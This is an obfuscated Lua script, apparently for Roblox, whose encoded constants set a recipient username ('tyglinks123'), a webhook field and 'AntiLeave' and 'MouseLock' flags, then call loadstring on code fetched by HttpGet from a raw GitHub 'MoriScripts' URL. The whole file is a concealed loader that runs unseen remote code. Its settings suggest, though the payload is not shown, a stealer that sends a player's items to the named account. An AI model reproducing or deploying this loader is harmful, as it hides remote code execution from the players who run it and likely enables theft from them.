--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v80,v19);v19=nil;v87=1;end end else return v80;end end end);local function v20(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -(1065 -(68 + 997)))) then v82=(v31/((3 -(1271 -(226 + 1044)))^(v32-(2 -(4 -3)))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-1)) + (569 -(330 + 37 + 201)))) ;return v82-(v82%(928 -(210 + 4 + 159 + 554))) ;end end else local v83=0;local v84;while true do if (v83==(0 + 0)) then v84=2^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + (847 -252)))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;return (v40 * (30800116 -14022900)) + (v39 * (65886 -(87 + 263))) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=181 -((858 -(368 + 423)) + 113) ;local v44=(v20(v42,3 -2 ,15 + 5 ) * ((4 -2)^(24 + 8))) + v41 ;local v45=v20(v42,83 -62 ,983 -(802 + 150) );local v46=((v20(v42,85 -53 )==(1 -(18 -(10 + 8)))) and  -((3 -2) + 0)) or 1 ;if (v45==(997 -(915 + 82))) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else local v89=0;while true do if (v89==((442 -(416 + 26)) -0)) then v45=1188 -(1069 + (376 -258)) ;v43=0 -0 ;break;end end end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * ((1 + 0 + 0)/0))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((3 -1)^(52 + 0)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==0) then return "";end end v48=v3(v16,v18,(v18 + v47) -(1 -0) );v18=v18 + v47 ;local v49={};for v64=439 -(145 + 293) , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=(1 + 1)) then else v55=nil;v56=nil;v50=3;end if (v50~=1) then else v53=nil;v54=nil;v50=2;end if ((0 -0)~=v50) then else v51=0;v52=nil;v50=1;end if (v50==(3 + 0)) then v57=nil;while true do local v90=651 -(494 + 157) ;local v91;while true do if (v90==(0 -0)) then v91=0;while true do if (v91==(0 + 0)) then if (v51==(1 + 1)) then local v98=0 + 0 ;while true do if (v98==0) then for v145=1,v56 do local v146=836 -(660 + 176) ;local v147;local v148;local v149;local v150;local v151;while true do if (v146~=2) then else v151=nil;while true do if (v147==(1 + 0)) then v150=nil;v151=nil;v147=204 -(14 + 188) ;end if (v147~=2) then else while true do if (v148~=0) then else v149=675 -(534 + 141) ;v150=nil;v148=1;end if (v148==1) then v151=nil;while true do if (v149==0) then local v179=0;local v180;local v181;while true do if (v179==(0 + 0)) then v180=0;v181=nil;v179=1 + 0 ;end if (v179==(1 + 0)) then while true do if (v180==(0 -0)) then v181=0 -0 ;while true do if (v181==(0 -0)) then local v190=0;local v191;while true do if (v190~=(0 + 0)) then else v191=0 + 0 ;while true do if (0==v191) then local v201=396 -(115 + 281) ;while true do if (v201==0) then v150=v21();v151=nil;v201=1;end if (v201==(2 -1)) then v191=1;break;end end end if (v191==(1 + 0)) then v181=1;break;end end break;end end end if (v181==(2 -1)) then v149=1;break;end end break;end end break;end end end if (v149==(3 -2)) then if (v150==(868 -(550 + 317))) then v151=v21()~=0 ;elseif (v150==(2 -0)) then v151=v24();elseif (v150~=3) then else v151=v25();end v57[v145]=v151;break;end end break;end end break;end if ((0 -0)==v147) then v148=0 -0 ;v149=nil;v147=1;end end break;end if (v146==(286 -(134 + 151))) then v149=nil;v150=nil;v146=2;end if ((1665 -(970 + 695))==v146) then v147=0 -0 ;v148=nil;v146=1;end end end v55[1993 -(582 + 1408) ]=v21();v98=3 -2 ;end if ((1 -0)~=v98) then else for v152=1,v23() do local v153=0 -0 ;local v154;local v155;while true do if (v153==(1824 -(1195 + 629))) then local v169=0;while true do if ((0 -0)~=v169) then else v154=241 -(187 + 54) ;v155=nil;v169=781 -(162 + 618) ;end if (v169==1) then v153=1 + 0 ;break;end end end if (v153==(1 + 0)) then while true do if (v154==(0 -0)) then v155=v21();if (v20(v155,1,1)~=(0 -0)) then else local v170=0 + 0 ;local v171;local v172;local v173;while true do if (2~=v170) then else local v174=1636 -(1373 + 263) ;local v175;while true do if (0==v174) then v175=0;while true do if (v175~=1) then else v170=1003 -(451 + 549) ;break;end if (v175==(0 + 0)) then local v187=0 -0 ;while true do if (v187==(1 -0)) then v175=1385 -(746 + 638) ;break;end if (v187==0) then if (v20(v172,1,1)==(1 + 0)) then v173[2 -0 ]=v57[v173[343 -(218 + 123) ]];end if (v20(v172,1583 -(1535 + 46) ,2)==(1 + 0)) then v173[3]=v57[v173[3]];end v187=1;end end end end break;end end end if (v170~=(1 + 2)) then else if (v20(v172,3,563 -(306 + 254) )==(1 + 0)) then v173[4]=v57[v173[4]];end v52[v152]=v173;break;end if (v170~=(0 -0)) then else local v177=0;while true do if (v177~=(1468 -(899 + 568))) then else v170=1 + 0 ;break;end if (0==v177) then v171=v20(v155,2,3);v172=v20(v155,9 -5 ,609 -(268 + 335) );v177=1;end end end if (v170==(291 -(60 + 230))) then local v178=572 -(426 + 146) ;while true do if (v178==1) then v170=1 + 1 ;break;end if ((1456 -(282 + 1174))==v178) then v173={v22(),v22(),nil,nil};if (v171==(0 + 0)) then local v185=1024 -(706 + 318) ;local v186;while true do if (v185==0) then v186=0;while true do if (v186==(1251 -(721 + 530))) then v173[1274 -(945 + 326) ]=v22();v173[4]=v22();break;end end break;end end elseif (v171==1) then v173[3]=v23();elseif (v171==(4 -2)) then v173[3]=v23() -(2^(15 + 1)) ;elseif (v171~=(703 -(271 + 429))) then else local v198=0 + 0 ;local v199;local v200;while true do if ((1501 -(1408 + 92))==v198) then while true do if (v199~=(1086 -(461 + 625))) then else v200=1288 -(993 + 295) ;while true do if (v200~=0) then else v173[1 + 2 ]=v23() -((1173 -(418 + 753))^(7 + 9)) ;v173[1 + 3 ]=v22();break;end end break;end end break;end if (0==v198) then v199=0;v200=nil;v198=1 + 0 ;end end end v178=1;end end end end end break;end end break;end end end v51=3;break;end end end if (v51==(1 + 2)) then local v99=0;while true do if ((529 -(406 + 123))~=v99) then else for v156=1,v23() do v53[v156-(1770 -(1749 + 20)) ]=v28();end return v55;end end end v91=1 + 0 ;end if (1==v91) then if (v51==(1323 -(1249 + 73))) then v55={v52,v53,nil,v54};v56=v23();v57={};v51=2;end if (v51~=(1145 -(466 + 679))) then else local v100=0;while true do if (v100==0) then v52={};v53={};v100=1;end if (v100==1) then v54={};v51=2 -1 ;break;end end end break;end end break;end end end break;end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==1) then if (v79<=9) then if (v79<=4) then if (v79<=1) then if (v79==0) then local v101=v78[2];local v102,v103=v69(v76[v101](v13(v76,v101 + 1 ,v78[3])));v71=(v103 + v101) -1 ;local v104=0;for v121=v101,v71 do local v122=0;while true do if (0==v122) then v104=v104 + 1 ;v76[v121]=v102[v104];break;end end end else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=2) then v76[v78[2]]();elseif (v79==3) then local v127=0;local v128;local v129;while true do if (v127==0) then v128=v78[2];v129=v76[v78[3]];v127=1;end if (v127==1) then v76[v128 + 1 ]=v129;v76[v128]=v129[v78[4]];break;end end else v76[v78[2]]=v60[v78[3]];end elseif (v79<=6) then if (v79==5) then v60[v78[3]]=v76[v78[2]];else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=7) then v76[v78[2]]=v78[3]~=0 ;elseif (v79==8) then do return;end else local v132=0;local v133;while true do if (0==v132) then v133=v78[2];v76[v133]=v76[v133](v13(v76,v133 + 1 ,v71));break;end end end elseif (v79<=14) then if (v79<=11) then if (v79>10) then local v112=v78[2];local v113,v114=v69(v76[v112](v13(v76,v112 + 1 ,v78[3])));v71=(v114 + v112) -1 ;local v115=0;for v123=v112,v71 do v115=v115 + 1 ;v76[v123]=v113[v115];end else v76[v78[2]]=v78[3];end elseif (v79<=12) then v76[v78[2]]();elseif (v79==13) then local v134=v78[2];local v135=v76[v78[3]];v76[v134 + 1 ]=v135;v76[v134]=v135[v78[4]];else v76[v78[2]]=v60[v78[3]];end elseif (v79<=16) then if (v79>15) then do return;end else v60[v78[3]]=v76[v78[2]];end elseif (v79<=17) then v76[v78[2]]=v78[3]~=0 ;elseif (v79==18) then local v141=0;local v142;while true do if (0==v141) then v142=v78[2];v76[v142]=v76[v142](v13(v76,v142 + 1 ,v71));break;end end else v76[v78[2]]=v78[3];end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030B3O007479676C696E6B7331323303073O00576562682O6F6B030C3O00576562682O6F6B204865726503093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120A3O00023O00120F3O00013O00120A3O00043O00120F3O00033O00120A3O00023O00120F3O00053O0012043O00063O0030013O000700080012043O00063O0030013O000900080012043O00063O0030013O000A00080012043O000B3O0012040001000C3O00200D00010001000D00120A0003000E4O0007000400014O000B000100044O00125O00022O000C3O000100012O00103O00017O00",v9(),...);
